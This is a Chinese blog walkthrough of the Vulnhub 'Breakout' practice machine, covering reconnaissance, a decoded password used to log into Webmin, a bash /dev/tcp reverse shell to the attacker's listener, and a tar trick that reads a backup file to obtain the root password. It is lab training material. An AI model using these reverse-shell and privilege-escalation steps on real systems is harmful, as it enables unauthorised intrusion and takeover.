02-breakout靶机实验实战演练

已于 2022-11-10 19:47:55 修改
阅读量896 收藏 3
点赞数 1
分类专栏: 学习 文章标签: linux 运维 网络 安全
于 2022-11-10 19:02:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lianliandad/article/details/127794483
版权

一、明确目标

 

 

Kali :192.168.119.129

靶机:192.168.119.141

 

探测ip

 

 

二、信息搜集

nmap扫描端口

d777d538aee84dbbaff07b1f5da975f1.png

 

去访问80端口:

查看:网页源码发现 一句话

 

进行解密

632bd20c45564071b41c3d717b4dc57e.png

 

先记录一下可能会是密码  .2uqPEfj3D<P'a-3

10000端口: 之后在进行登录测试

9d0edb3b3a844ed59050767b5c8f63d9.png

 

 

 

20000端口: 之后在进行登录测试

fdd23a2c4b544f07bad5c1ba2a6b5040.png

 

 

 

 

 

基于之前nmap 扫描到 开放Samba 服务 ,在User\cyber有存在 cyber 用户,可能是用户名。

 

 

79d192abc8c04b5195ab63fcba81cbf3.png

 

扫描目录

4d0d364fb8034500a2b0639b1e01c5b2.png

 

去访问状态码为200 的结果

http://192.168.119.141/manual/en/index.html

76ec1f62b27842878daad6048551af0a.png

 

 

三、漏洞验证

登录

尝试登录10000和20000端口的网页

用户名:cyber    密码:.2uqPEfj3D<P'a-3

 

6b342d87c51b4f43a881be5fa707cfde.png

 

 

在界面底下有个图标  >_   打开可以输入命令 执行 以下命令

~cat user.txt发现第一个flag.

01ded670b80047419badd3006e381ab1.png

 

 

进行反弹shell

 

在kali 端 开启监听   端口为6666

4053c81f0927404bb002d5bceef10654.png

 

 

 

 

 

 

 

 

 

 

 

在网页界面,继续执行命令

bash -i >& /dev/tcp/192.168.119.129/6666 0>&1

这里的ip 为内网主机(靶机)的ip.

 

e8668f5d6e7540bebee1d5908cce9cb8.png

 

反弹成功 内网机器反弹到外网 执行系统命令

9970517deffd4fbeac18e99accf39766.png

 

四、获取root 权限

发现有个backup (备份文件),进去查看

 

8dd6dce578bd4c9fa4618d3df98ee739.png

可以用tar命令将old_pass.bak压缩再解压后的名为bak.tar

然后在使用命令 tar -xf 将bak.tar 进行解压

 

 

 

五、系统提权

 

查看是否生成了bak.tar 文件,直接读取.old_pass.bak文件无法读取,但是我们可以用tar命令将其压缩在解压就能在 cyber 的用户权限下 去查看里面的具体内容了

 

10ce8b4a4adc4da88d34332e34d32545.png

 

这时查看 old_pass.bak获取到了密码

 

 

进行权限提升

~$su root

输入密码:Ts&4&YurgtRX(=~h

1bb24adc2819424fabc75757dea6d1d0.png

 

提权成功,whoami 操作系统中用于查看当前有效用户名的命令,来看看现在是否是具有root用户权限

87c390956db54b0daa499a8e23acb82f.png

~cat rOOt.txt

获得到了第二个flag.

恭喜完成!!!

 

燕返故人归来
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机实战——Matrix2
冠霖L的博客
11-10 1171
Matrix2靶机下载地址: https://download.vulnhub.com/matrix/matrix2-Unknowndevice64.ova 环境: VMware 15虚拟机软件 Matrix2靶机IP地址: 192.168.220.159 Kali的IP地址: 192.168.220.155 Matrix2靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.1...
BME280-Breakout-master.zip
05-18
标题 "BME280-Breakout-master.zip" 暗示了这是一个关于BME280传感器开发板的项目源代码或文档集合。BME280是一款由博世(Bosch)公司生产的高性能环境传感器,能够同时测量温度、湿度和气压。这个zip文件很可能是为...
vulnhub靶机22 02-Breakout.zip
linxaiomo
08-02 579
简单的渗透测试靶机,适合初级学习者,解题思路完整,推荐阅读学习,交流讨论。
02-Breakout靶机实战思路总结(读取任意文件提权,smb协议,Enum4linux
qq_39641273的博客
06-12 377
这个主机不算很难,对于新手难度适中,可以尝试练手,如果没有思路本篇文档可供参考。知识点:smb协议,Enum4linux,文件任意读取,brainfuck编码。
vuln靶机--BreakOut
bobo_milk的博客
05-17 1058
一、信息收集 常规的主机发现以及端口扫描,扫描自己所在的网段。 nmap 192.168.216.0/24 nmap -A -v -T4 -p 1-65535 192.168.216.149 可以看到服务器开启了80端口,139和445端口是samba服务,实现文件共享,10000和20000端口则是搭建了cms,而且版本也暴露了出来。 二、漏洞发现 首先先来查看80端口,只是一个普通的apache的index文件,apache的版本也比较高,因此并没有发现漏洞 在查看了源
vulnhub EMPIRE: BREAKOUT靶机
小小猪的博客
08-30 688
/tar -cvf pass.tar /var/backups/.old_pass.bak (注:此处使用./tar 表示使用此目录的tar文件)开启了smb服务,enum4linux 192.168.226.129收集更多信息,web指纹页面收集也可以,收集到用户名。直接读取.old_pass.bak文件无法读取,但是我们可以用tar命令将其压缩在解压就可以顺利读取了。经过一番寻找之后,发现/var/backups下有个备份文件.old_pass.bak。再次查看,即可查看到root密码。...
强化学习-Breakout-v0.zip
最新发布
06-01
【标题】"强化学习-Breakout-v0.zip" 指的是一个与强化学习相关的实践项目,其中使用了Atari游戏“Breakout”的环境“Breakout-v0”。在强化学习中,Breakout是一个经典的测试环境,它模拟了早期街机游戏,玩家需要...
DA14531MOD-Breakout:DA14531MOD-Breakout板
02-18
【DA14531MOD-Breakout:DA14531MOD-Breakout板】 DA14531MOD-Breakout是一款基于DA14531智能蓝牙低功耗(SmartBond TINY)微控制器的开发板,旨在为开发者提供一个便捷的平台,用于测试、原型设计和应用开发。这款...
java-breakout
05-13
在【压缩包子文件的文件名称列表】中,我们看到的是"java-breakout-master",这通常表示项目源代码的主分支。在这个目录下,我们可以期待找到以下组成部分: 1. 源代码文件:可能包括.java文件,这些文件包含了游戏...
2d-breakout
03-14
《2D-Breakout游戏开发详解——基于JavaScript》 在计算机游戏的历史长河中,"Breakout"(打砖块)是一款经典的街机游戏,它以其简单却极具挑战性的玩法深受玩家喜爱。在这个2D-Breakout项目中,我们将利用...
OpenGL-实战篇--Breakout--音效--54
weixin_41155760的博客
11-11 3129
学习链接:中文--------英语原文 给游戏添加音乐! 参考上文链接导入相应的头文件和lib、DLL即可。 Game.cpp: #include "ResourceManager.h" #include "Game.h" #include "SpriteRenderer.h" #include "BallObject.h" #include "ParticleGenerator.h" #include "PostProcessor.h" #include <irrklang/irrKlang.h&g
VulnHub靶机渗透实战7-BREAKOUT
随心所欲不逾矩
11-18 336
靶机超级简单。靶机和Kali桥接。
Vulnhub:BREAKOUT靶机
qq_63283137的博客
10-10 531
smb服务是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通,通过 SMB 协议,客户端应用程序可以在各种网络环境下读、写服务器上的文件,以及对服务器程序提出服务请求。可以配置操作系统内部,如用户,磁盘配额,服务或配置文件,以及修改和控制开源应用程序。每当看到二进制文件的副本时,都应该检查一下其 Capabilities(功能)和 suid 程序。根据爆破出来的用户,与解密出的密码尝试登录webmin。再分析扫描出的信息,发现端口服务是smb。发现密码备份文件,但是没有任何的权限。
02-Breakout vulnhub靶场(tar命令,反弹shell笔记)
weixin_62621015的博客
03-19 296
02-Breakout vulnhub靶场个人通关记录
靶机练习 No.22 Vulnhub靶机 Breakout samba,webmin,tar提权
YouthBelief的博客
01-24 3822
0x00 环境准备 靶机下载 https://www.vulnhub.com/entry/empire-breakout,751/ 启动方式 VMware 启动 版本信息 Name: Empire: Breakout Date release: 21 Oct 2021 Author: icex64 & Empire Cybersecurity Series: Empire 靶机描述 Difficulty: Easy This box was created to be an E
靶机1 Empire:Breakout(帝国突围)
honest_gg的博客
09-09 1178
靶机首先通过文件共享服务可以使用 enum4linux 枚举信息,在通过主页面进行信息收集,得到相关信息,登录后台getshelll,最后通过可执行文件进行提权
Vulnhub_breackout靶机渗透测试
m0_66225311的博客
09-15 118
本次靶机对我来说还是比较难的,因为很多知识点都没有很好的接触过,都是第一次见,也从中学到了很多知识首先就是注释中的加密后的字符串了,因为有CTF密码学方向的学习,所以还是有所察觉的接下来就是enum4linux工具对smb服务的信息收集操作了,增加了对smb服务利用的知识点本次获取shell的操作可以说很简单了,网站直接就有可以执行shell的功能。
【Vulnhub靶场】Breakout
Nailaoyyds的博客
06-17 697
目录前言一、信息收集0x00 arp-scan扫描0x01 nmap扫描0x02 dirsearch扫描二、漏洞利用0x01 webmin 远程代码漏洞0x02 Brainfuck0x03 enum4linux0x04 反弹shell0x05 搜集信息三、提权0x00 tar利用 总结 arp-scan -I eth1 -l https://192.168.56.101:10000 https://192.168.56.101:20000 二者页面一致 正常页面 未发现webmin源码内
[渗透测试学习靶机02] vulnhub靶场 Empire: Breakout
weixin_47112073的博客
10-13 675
渗透测试学习,vulnhub靶场练习,简单靶机Empire: Breakout
vulnhub靶场 breakout
08-29
EMPIRE: BREAKOUT是一个在VulnHub网站上提供的虚拟机靶场。你可以在VulnHub网站上搜索EMPIRE: BREAKOUT,并下载该靶场进行学习和实践。 VulnHub是一个提供各种虚拟机靶场的网站,旨在帮助人们学习和提升网络安全技能...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值